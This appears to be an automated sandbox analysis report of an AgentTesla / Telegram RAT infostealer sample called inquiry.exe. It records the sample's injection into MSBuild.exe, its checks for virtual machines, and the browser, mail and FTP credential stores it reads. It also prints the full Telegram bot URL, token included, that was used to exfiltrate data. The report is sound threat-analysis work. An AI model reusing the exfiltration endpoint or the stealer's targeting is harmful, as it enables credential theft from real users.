Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6840	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6852	Thread sleep count: 483 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6852	Thread sleep count: 9370 > 30	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 483			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 9370			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: MSBuild.exe, 00000002.00000002.619340495.00000000060A2000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D45AE5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00D45AE5

Source: C:\Users\user\Desktop\inquiry.exe

0_2_00D45AE5

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D410B0 ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapFree,

0_2_00D410B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00A906DA mov eax, dword ptr fs:[00000030h]	0_2_00A906DA
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00A908EE mov eax, dword ptr fs:[00000030h]	0_2_00A908EE
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00A90A1C mov eax, dword ptr fs:[00000030h]	0_2_00A90A1C
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00A9099F mov eax, dword ptr fs:[00000030h]	0_2_00A9099F
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00A909DE mov eax, dword ptr fs:[00000030h]	0_2_00A909DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_01064F58 LdrInitializeThunk,

2_2_01064F58

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D44142 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00D44142
Source: C:\Users\user\Desktop\inquiry.exe	Code function: 0_2_00D44111 SetUnhandledExceptionFilter,		0_2_00D44111

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\inquiry.exe

Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\inquiry.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E60008

Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\user\Desktop\inquiry.exe'

Jump to behavior

Source: MSBuild.exe, 00000002.00000002.616021105.0000000001B10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: MSBuild.exe, 00000002.00000002.616021105.0000000001B10000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: MSBuild.exe, 00000002.00000002.616021105.0000000001B10000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: MSBuild.exe, 00000002.00000002.616021105.0000000001B10000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D474DC cpuid

0_2_00D474DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\inquiry.exe

Code function: 0_2_00D43A1D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00D43A1D

Stealing of Sensitive Information:

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0.2.inquiry.exe.ea0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.inquiry.exe.ea0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inquiry.exe PID: 4388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Source: Yara match	File source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0.2.inquiry.exe.ea0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.inquiry.exe.ea0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inquiry.exe PID: 4388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6336, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Application Shimming1	Application Shimming1	Disable or Modify Tools1	OS Credential Dumping2	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Web Service1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Service Execution2	Windows Service3	Windows Service3	Obfuscated Files or Information1	Input Capture1	System Information Discovery125	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection212	Software Packing1	Credentials in Registry1	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	Security Software Discovery141	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion131	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection212	Cached Domain Credentials	Virtualization/Sandbox Evasion131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
inquiry.exe	47%	Virustotal		Browse
inquiry.exe	64%	ReversingLabs	Win32.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://tyHOrV.com	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.telegram.orgD8sn	0%	Avira URL Cloud	safe
https://api.telegram.org4sn	0%	Avira URL Cloud	safe
https://oLurbWzWRU.org	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://api.ipify.org%$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://tyHOrV.com	MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/	inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp	false		high
https://api.telegram.org/bot1803146213:AAHYyCRx7FggQ9LfPbrIs79ZUWCEc9wNnDo/sendDocumentdocument-----	MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	false		high
https://api.ipify.org%GETMozilla/5.0	MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://api.telegram.orgD8sn	MSBuild.exe, 00000002.00000002.617570816.00000000032DC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	MSBuild.exe, 00000002.00000002.617570816.00000000032DC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmp	false		high
https://api.telegram.org4sn	MSBuild.exe, 00000002.00000002.617356072.000000000328F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://oLurbWzWRU.org	MSBuild.exe, 00000002.00000002.617344247.000000000328B000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.617328263.0000000003287000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	inquiry.exe, 00000000.00000002.353131362.0000000000EA0000.00000004.00000001.sdmp, MSBuild.exe, 00000002.00000002.613266001.0000000000402000.00000040.00020000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org%$	MSBuild.exe, 00000002.00000002.616102649.0000000002F21000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483914
Start date:	15.09.2021
Start time:	16:12:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	inquiry.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/1@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 89.3% (good quality ratio 83.7%) Quality average: 81.5% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 25 Number of non-executed functions: 17
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 2.20.86.117, 20.82.210.154, 20.54.110.249, 40.112.88.60, 93.184.221.240, 23.216.77.209, 23.216.77.208, 23.35.236.56, 20.82.209.183 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:14:10	API Interceptor	778x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
149.154.167.220	0T06zz5Z9f.exe	Get hash	malicious	Browse
	aZq3gco8Ab.exe	Get hash	malicious	Browse
	34u04QCvgu.exe	Get hash	malicious	Browse
	Transfer Swift.xlsx	Get hash	malicious	Browse
	nj8GTf3j31.exe	Get hash	malicious	Browse
	tmt.exe	Get hash	malicious	Browse
	CI and PL of CMZBD-210090.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.13106.exe	Get hash	malicious	Browse
	DHL Cargo Arrival.xlsx	Get hash	malicious	Browse
	biNmoafSHb.exe	Get hash	malicious	Browse
	QUOTATION REQUEST REF#E6448.2.exe	Get hash	malicious	Browse
	4y3aqXJURf.apk	Get hash	malicious	Browse
	UK COVID UPDATES AND ENTITLEMENT.exe	Get hash	malicious	Browse
	VzqyxdLij2.exe	Get hash	malicious	Browse
	PUcvjsKtXq.exe	Get hash	malicious	Browse
	SeptemberOrderlist.pdf.exe	Get hash	malicious	Browse
	4XIWeWhn85.exe	Get hash	malicious	Browse
	E9Vl6Ve253.exe	Get hash	malicious	Browse
	payment.exe	Get hash	malicious	Browse
	doc_306_01.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.telegram.org	0T06zz5Z9f.exe	Get hash	malicious	Browse	149.154.167.220
	aZq3gco8Ab.exe	Get hash	malicious	Browse	149.154.167.220
	34u04QCvgu.exe	Get hash	malicious	Browse	149.154.167.220
	Transfer Swift.xlsx	Get hash	malicious	Browse	149.154.167.220
	nj8GTf3j31.exe	Get hash	malicious	Browse	149.154.167.220
	tmt.exe	Get hash	malicious	Browse	149.154.167.220
	CI and PL of CMZBD-210090.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetect.malware1.13106.exe	Get hash	malicious	Browse	149.154.167.220
	DHL Cargo Arrival.xlsx	Get hash	malicious	Browse	149.154.167.220
	tNh3d45aXt.exe	Get hash	malicious	Browse	149.154.167.220
	biNmoafSHb.exe	Get hash	malicious	Browse	149.154.167.220
	QUOTATION REQUEST REF#E6448.2.exe	Get hash	malicious	Browse	149.154.167.220
	UK COVID UPDATES AND ENTITLEMENT.exe	Get hash	malicious	Browse	149.154.167.220
	VzqyxdLij2.exe	Get hash	malicious	Browse	149.154.167.220
	1uHjqG0dPw.exe	Get hash	malicious	Browse	149.154.167.220
	PUcvjsKtXq.exe	Get hash	malicious	Browse	149.154.167.220
	SeptemberOrderlist.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	4XIWeWhn85.exe	Get hash	malicious	Browse	149.154.167.220
	E9Vl6Ve253.exe	Get hash	malicious	Browse	149.154.167.220
	payment.exe	Get hash	malicious	Browse	149.154.167.220

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	0T06zz5Z9f.exe	Get hash	malicious	Browse	149.154.167.220
	aZq3gco8Ab.exe	Get hash	malicious	Browse	149.154.167.220
	XbvAoRKnFm.exe	Get hash	malicious	Browse	149.154.167.99
	34u04QCvgu.exe	Get hash	malicious	Browse	149.154.167.220
	Transfer Swift.xlsx	Get hash	malicious	Browse	149.154.167.220
	nj8GTf3j31.exe	Get hash	malicious	Browse	149.154.167.220
	tmt.exe	Get hash	malicious	Browse	149.154.167.220
	CI and PL of CMZBD-210090.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetect.malware1.13106.exe	Get hash	malicious	Browse	149.154.167.220
	DHL Cargo Arrival.xlsx	Get hash	malicious	Browse	149.154.167.220
	Terw9bPuiD.exe	Get hash	malicious	Browse	149.154.167.99
	biNmoafSHb.exe	Get hash	malicious	Browse	149.154.167.220
	QUOTATION REQUEST REF#E6448.2.exe	Get hash	malicious	Browse	149.154.167.220
	4y3aqXJURf.apk	Get hash	malicious	Browse	149.154.167.220
	UK COVID UPDATES AND ENTITLEMENT.exe	Get hash	malicious	Browse	149.154.167.220
	VzqyxdLij2.exe	Get hash	malicious	Browse	149.154.167.220
	zfl3hUTQWN.exe	Get hash	malicious	Browse	149.154.167.99
	PUcvjsKtXq.exe	Get hash	malicious	Browse	149.154.167.220
	SeptemberOrderlist.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	SxvDkdIwWW.exe	Get hash	malicious	Browse	149.154.167.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	rVTXvm8ZMM.exe	Get hash	malicious	Browse	149.154.167.220
	qy2t7MIRoi.exe	Get hash	malicious	Browse	149.154.167.220
	0T06zz5Z9f.exe	Get hash	malicious	Browse	149.154.167.220
	34u04QCvgu.exe	Get hash	malicious	Browse	149.154.167.220
	m3maOnY6Uy.exe	Get hash	malicious	Browse	149.154.167.220
	nj8GTf3j31.exe	Get hash	malicious	Browse	149.154.167.220
	tmt.exe	Get hash	malicious	Browse	149.154.167.220
	CI and PL of CMZBD-210090.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetect.malware1.13106.exe	Get hash	malicious	Browse	149.154.167.220
	setup_x86_x64_install.exe	Get hash	malicious	Browse	149.154.167.220
	Halkbank_Ekstre_20200521_082357_541079.exe	Get hash	malicious	Browse	149.154.167.220
	Z9GkJvygEk.exe	Get hash	malicious	Browse	149.154.167.220
	RZAcKBlQo0.exe	Get hash	malicious	Browse	149.154.167.220
	F1MwWrwBR7.exe	Get hash	malicious	Browse	149.154.167.220
	biNmoafSHb.exe	Get hash	malicious	Browse	149.154.167.220
	kecFPnbu5K.exe	Get hash	malicious	Browse	149.154.167.220
	QUOTATION REQUEST REF#E6448.2.exe	Get hash	malicious	Browse	149.154.167.220
	5PfBAmWq3V.exe	Get hash	malicious	Browse	149.154.167.220
	ac1khvFT2V.exe	Get hash	malicious	Browse	149.154.167.220
	UK COVID UPDATES AND ENTITLEMENT.exe	Get hash	malicious	Browse	149.154.167.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\dj2qhmgg.ty5\Chrome\Default\Cookies Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
